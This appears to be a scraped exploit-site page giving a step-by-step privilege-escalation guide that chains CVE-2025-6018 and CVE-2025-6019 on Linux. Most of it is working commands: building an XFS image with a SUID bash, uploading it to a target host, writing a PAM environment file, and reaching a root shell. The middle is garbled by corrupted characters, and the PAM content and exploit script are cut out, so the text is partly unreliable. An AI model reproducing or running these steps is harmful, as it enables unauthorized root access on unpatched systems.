Share
## https://sploitus.com/exploit?id=A9737326-EAE9-5681-A0DA-10AD2C726211
# CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Guide
## ๐ Quick Exploitation Steps
### Step 1: Prepare XFS Image (Local Machine)
```bash
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image
```
---
### Step 2: Upload Files to Target
```bash
# Upload exploit script and image
scp exp.sh abc@10.129.252.9:~/
scp xfs.image abc@10.129.252.9:~/
```
---
### Step 3: First Login - Configure PAM
```bash
# SSH login to target
ssh phileasfogg3@10.129.252.9
# Write PAM environment variables
cat > ~/.pam_environment โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
bash-5.2# whoami
root
```
---
## ๐ง Troubleshooting
| Issue | Solution |
| ----------------------------- | ------------------------------------------------ |
| `CanReboot` returns `('no',)` | Make sure you logged out and back in (Step 3) |
| `Not authorized` error | Check `~/.pam_environment` content is correct |
| SUID bash not found | Re-upload `xfs.image` and verify SUID bit is set |
---
## ๐ Key Points
- โ
**Must logout and re-login**: PAM config only takes effect in new sessions
- โ
**Verify CanReboot**: Confirm it returns `('yes',)` before running script
- โ
**Use SSH login**: Don't use `ssh -t user@host "cmd"` style execution
---
## ๐ฑ Cat Guardian
**If it fails, ensure every step is executed strictly in order!**